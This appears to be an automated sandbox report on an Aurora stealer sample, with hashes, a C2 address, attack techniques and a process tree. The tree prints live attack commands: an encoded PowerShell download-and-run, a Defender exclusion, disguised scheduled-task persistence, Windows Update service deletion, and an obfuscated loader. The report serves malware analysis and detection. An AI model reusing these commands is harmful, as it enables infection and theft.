aurora | 10b527427042ca32d0683e016e2b5458799363d68bb4ee616b66ffdcd9377585

Analysis

max time kernel
23s
max time network
78s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
29-03-2023 06:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Client.exe
Size

1016KB
MD5

77081f23b31d05de271d128eebceb4bc
SHA1

f06c4dd766c4784d6b513ca9bad819494e726c8b
SHA256

10b527427042ca32d0683e016e2b5458799363d68bb4ee616b66ffdcd9377585
SHA512

584db879c3360ec08d5f0e6bf08c87971b17ccf159674874fb5f54207087ef22ca953a9fe660d84c739e49621283ca3919b40735adad14e96eb4951c7dcd4c35
SSDEEP

3072:0nTjRD5V730BSng7tJr8Khw6pItWgAEqjAxou3e7BNIdOAg0FujDvktlL0BjMwmk:G1V7h2r/hwNWgAEqjAKmkAOECjMwm

Score

10^/10

aurora evasion spyware stealer

Malware Config

Extracted

Family

aurora

107.182.129.73:8081

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

SmartDefRun.exe

description	pid	process	target process
PID 4672 created 3120	4672	SmartDefRun.exe	Explorer.EXE
PID 4672 created 3120	4672	SmartDefRun.exe	Explorer.EXE
PID 4672 created 3120	4672	SmartDefRun.exe	Explorer.EXE
PID 4672 created 3120	4672	SmartDefRun.exe	Explorer.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

17 4392 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 4 IoCs

Processes:

C4Loader.exenew2.exeSysApp.exeSmartDefRun.exe

pid process

5096 C4Loader.exe
468 new2.exe
1540 SysApp.exe
4672 SmartDefRun.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
17	4392	powershell.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	SmartDefRun.exe

pid	process
5096	C4Loader.exe
468	new2.exe
1540	SysApp.exe
4672	SmartDefRun.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

C4Client.exeSmartDefRun.exe

description	pid	process	target process
PID 1268 set thread context of 3464	1268	C4Client.exe	RegSvcs.exe
PID 4672 set thread context of 4492	4672	SmartDefRun.exe	dialer.exe

Drops file in Program Files directory 1 IoCs

Processes:

SmartDefRun.exe

description ioc process

File created C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe SmartDefRun.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3268 sc.exe
1428 sc.exe
1500 sc.exe
1936 sc.exe
1872 sc.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2488 1268 WerFault.exe C4Client.exe

description	ioc	process
File created	C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe	SmartDefRun.exe

pid	process
3268	sc.exe
1428	sc.exe
1500	sc.exe
1936	sc.exe
1872	sc.exe

pid	pid_target	process	target process
2488	1268	WerFault.exe	C4Client.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

powershell.exeSmartDefRun.exepowershell.exepowershell.exeSysApp.exe

pid	process
4392	powershell.exe
4392	powershell.exe
4672	SmartDefRun.exe
4672	SmartDefRun.exe
3216	powershell.exe
3216	powershell.exe
4672	SmartDefRun.exe
4672	SmartDefRun.exe
4672	SmartDefRun.exe
4672	SmartDefRun.exe
4600	powershell.exe
4600	powershell.exe
4600	powershell.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
1540	SysApp.exe
4672	SmartDefRun.exe
4672	SmartDefRun.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exewmic.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeIncreaseQuotaPrivilege	4516	wmic.exe
Token: SeSecurityPrivilege	4516	wmic.exe
Token: SeTakeOwnershipPrivilege	4516	wmic.exe
Token: SeLoadDriverPrivilege	4516	wmic.exe
Token: SeSystemProfilePrivilege	4516	wmic.exe
Token: SeSystemtimePrivilege	4516	wmic.exe
Token: SeProfSingleProcessPrivilege	4516	wmic.exe
Token: SeIncBasePriorityPrivilege	4516	wmic.exe
Token: SeCreatePagefilePrivilege	4516	wmic.exe
Token: SeBackupPrivilege	4516	wmic.exe
Token: SeRestorePrivilege	4516	wmic.exe
Token: SeShutdownPrivilege	4516	wmic.exe
Token: SeDebugPrivilege	4516	wmic.exe
Token: SeSystemEnvironmentPrivilege	4516	wmic.exe
Token: SeRemoteShutdownPrivilege	4516	wmic.exe
Token: SeUndockPrivilege	4516	wmic.exe
Token: SeManageVolumePrivilege	4516	wmic.exe
Token: 33	4516	wmic.exe
Token: 34	4516	wmic.exe
Token: 35	4516	wmic.exe
Token: 36	4516	wmic.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeIncreaseQuotaPrivilege	4516	wmic.exe
Token: SeSecurityPrivilege	4516	wmic.exe
Token: SeTakeOwnershipPrivilege	4516	wmic.exe
Token: SeLoadDriverPrivilege	4516	wmic.exe
Token: SeSystemProfilePrivilege	4516	wmic.exe
Token: SeSystemtimePrivilege	4516	wmic.exe
Token: SeProfSingleProcessPrivilege	4516	wmic.exe
Token: SeIncBasePriorityPrivilege	4516	wmic.exe
Token: SeCreatePagefilePrivilege	4516	wmic.exe
Token: SeBackupPrivilege	4516	wmic.exe
Token: SeRestorePrivilege	4516	wmic.exe
Token: SeShutdownPrivilege	4516	wmic.exe
Token: SeDebugPrivilege	4516	wmic.exe
Token: SeSystemEnvironmentPrivilege	4516	wmic.exe
Token: SeRemoteShutdownPrivilege	4516	wmic.exe
Token: SeUndockPrivilege	4516	wmic.exe
Token: SeManageVolumePrivilege	4516	wmic.exe
Token: 33	4516	wmic.exe
Token: 34	4516	wmic.exe
Token: 35	4516	wmic.exe
Token: 36	4516	wmic.exe
Token: SeIncreaseQuotaPrivilege	2488	WMIC.exe
Token: SeSecurityPrivilege	2488	WMIC.exe
Token: SeTakeOwnershipPrivilege	2488	WMIC.exe
Token: SeLoadDriverPrivilege	2488	WMIC.exe
Token: SeSystemProfilePrivilege	2488	WMIC.exe
Token: SeSystemtimePrivilege	2488	WMIC.exe
Token: SeProfSingleProcessPrivilege	2488	WMIC.exe
Token: SeIncBasePriorityPrivilege	2488	WMIC.exe
Token: SeCreatePagefilePrivilege	2488	WMIC.exe
Token: SeBackupPrivilege	2488	WMIC.exe
Token: SeRestorePrivilege	2488	WMIC.exe
Token: SeShutdownPrivilege	2488	WMIC.exe
Token: SeDebugPrivilege	2488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2488	WMIC.exe
Token: SeRemoteShutdownPrivilege	2488	WMIC.exe
Token: SeUndockPrivilege	2488	WMIC.exe
Token: SeManageVolumePrivilege	2488	WMIC.exe
Token: 33	2488	WMIC.exe
Token: 34	2488	WMIC.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

C4Client.exeRegSvcs.exepowershell.exenew2.execmd.execmd.execmd.exeSmartDefRun.exe

description	pid	process	target process
PID 1268 wrote to memory of 3464	1268	C4Client.exe	RegSvcs.exe
PID 1268 wrote to memory of 3464	1268	C4Client.exe	RegSvcs.exe
PID 1268 wrote to memory of 3464	1268	C4Client.exe	RegSvcs.exe
PID 1268 wrote to memory of 3464	1268	C4Client.exe	RegSvcs.exe
PID 1268 wrote to memory of 3464	1268	C4Client.exe	RegSvcs.exe
PID 3464 wrote to memory of 4392	3464	RegSvcs.exe	powershell.exe
PID 3464 wrote to memory of 4392	3464	RegSvcs.exe	powershell.exe
PID 3464 wrote to memory of 4392	3464	RegSvcs.exe	powershell.exe
PID 4392 wrote to memory of 5096	4392	powershell.exe	C4Loader.exe
PID 4392 wrote to memory of 5096	4392	powershell.exe	C4Loader.exe
PID 4392 wrote to memory of 5096	4392	powershell.exe	C4Loader.exe
PID 4392 wrote to memory of 468	4392	powershell.exe	new2.exe
PID 4392 wrote to memory of 468	4392	powershell.exe	new2.exe
PID 4392 wrote to memory of 1540	4392	powershell.exe	SysApp.exe
PID 4392 wrote to memory of 1540	4392	powershell.exe	SysApp.exe
PID 4392 wrote to memory of 1540	4392	powershell.exe	SysApp.exe
PID 4392 wrote to memory of 4672	4392	powershell.exe	SmartDefRun.exe
PID 4392 wrote to memory of 4672	4392	powershell.exe	SmartDefRun.exe
PID 468 wrote to memory of 4516	468	new2.exe	wmic.exe
PID 468 wrote to memory of 4516	468	new2.exe	wmic.exe
PID 2812 wrote to memory of 1428	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 1428	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 1500	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 1500	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 1936	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 1936	2812	cmd.exe	sc.exe
PID 468 wrote to memory of 3980	468	new2.exe	cmd.exe
PID 468 wrote to memory of 3980	468	new2.exe	cmd.exe
PID 2812 wrote to memory of 1872	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 1872	2812	cmd.exe	sc.exe
PID 3980 wrote to memory of 2488	3980	cmd.exe	WMIC.exe
PID 3980 wrote to memory of 2488	3980	cmd.exe	WMIC.exe
PID 2812 wrote to memory of 3268	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 3268	2812	cmd.exe	sc.exe
PID 2812 wrote to memory of 1104	2812	cmd.exe	reg.exe
PID 2812 wrote to memory of 1104	2812	cmd.exe	reg.exe
PID 468 wrote to memory of 2252	468	new2.exe	cmd.exe
PID 468 wrote to memory of 2252	468	new2.exe	cmd.exe
PID 2812 wrote to memory of 4992	2812	cmd.exe	reg.exe
PID 2812 wrote to memory of 4992	2812	cmd.exe	reg.exe
PID 2812 wrote to memory of 2240	2812	cmd.exe	reg.exe
PID 2812 wrote to memory of 2240	2812	cmd.exe	reg.exe
PID 2252 wrote to memory of 2112	2252	cmd.exe	WMIC.exe
PID 2252 wrote to memory of 2112	2252	cmd.exe	WMIC.exe
PID 2812 wrote to memory of 4976	2812	cmd.exe	reg.exe
PID 2812 wrote to memory of 4976	2812	cmd.exe	reg.exe
PID 2812 wrote to memory of 2032	2812	cmd.exe	reg.exe
PID 2812 wrote to memory of 2032	2812	cmd.exe	reg.exe
PID 4672 wrote to memory of 4492	4672	SmartDefRun.exe	dialer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3120

C:\Users\Admin\AppData\Local\Temp\C4Client.exe
"C:\Users\Admin\AppData\Local\Temp\C4Client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4392

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
5⤵
- Executes dropped EXE
PID:5096

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:468

C:\Windows\System32\Wbem\wmic.exe
wmic os get Caption
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\system32\cmd.exe
cmd /C "wmic path win32_VideoController get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2488

C:\Windows\system32\cmd.exe
cmd /C "wmic cpu get name"
6⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
7⤵
PID:2112

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1540

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 292
3⤵
- Program crash
PID:2488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#kryoeujoq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenMachine' /tr '''C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenMachine' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenMachine" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderUpd/Defender\UpdatedSmartScreen.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1428

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1500

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1936

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1872

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3268

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1104

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4992

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:2240

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4976

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:2032

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1268 -ip 1268
1⤵
PID:1316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NfbtuTqZgJyF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wZfgiBqlgCEyzP,[Parameter(Position=1)][Type]$UuqPamhhHm)$bwJKWHDEmPv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+'ct'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'legateTyp'+'e'+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+'Pu'+[Char](98)+''+[Char](108)+''+'i'+'c'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+'i'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$bwJKWHDEmPv.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Name'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+''+[Char](105)+'g,P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wZfgiBqlgCEyzP).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'im'+[Char](101)+''+','+'Ma'+[Char](110)+''+[Char](97)+'ged');$bwJKWHDEmPv.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](78)+''+'e'+'wS'+[Char](108)+'ot,'+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+'al',$UuqPamhhHm,$wZfgiBqlgCEyzP).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'i'+[Char](109)+'e,Ma'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $bwJKWHDEmPv.CreateType();}$HWusCYLHSlgfw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+''+'f'+'e'+[Char](72)+''+[Char](87)+''+[Char](117)+'s'+'C'+''+[Char](89)+'L'+'H'+''+[Char](83)+''+[Char](108)+''+[Char](103)+''+[Char](102)+'w');$qbrwPrXeJcCobu=$HWusCYLHSlgfw.GetMethod('q'+[Char](98)+''+[Char](114)+''+[Char](119)+'P'+[Char](114)+'Xe'+[Char](74)+''+'c'+''+[Char](67)+'ob'+[Char](117)+'',[Reflection.BindingFlags]'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LxxiljLzDzxySVNYWsz=NfbtuTqZgJyF @([String])([IntPtr]);$pxVxguugFiSnPwhokKBHnA=NfbtuTqZgJyF 